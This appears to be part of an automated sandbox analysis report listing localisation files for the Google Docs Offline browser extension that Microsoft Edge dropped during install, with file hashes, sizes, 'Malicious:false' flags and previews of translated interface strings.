                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
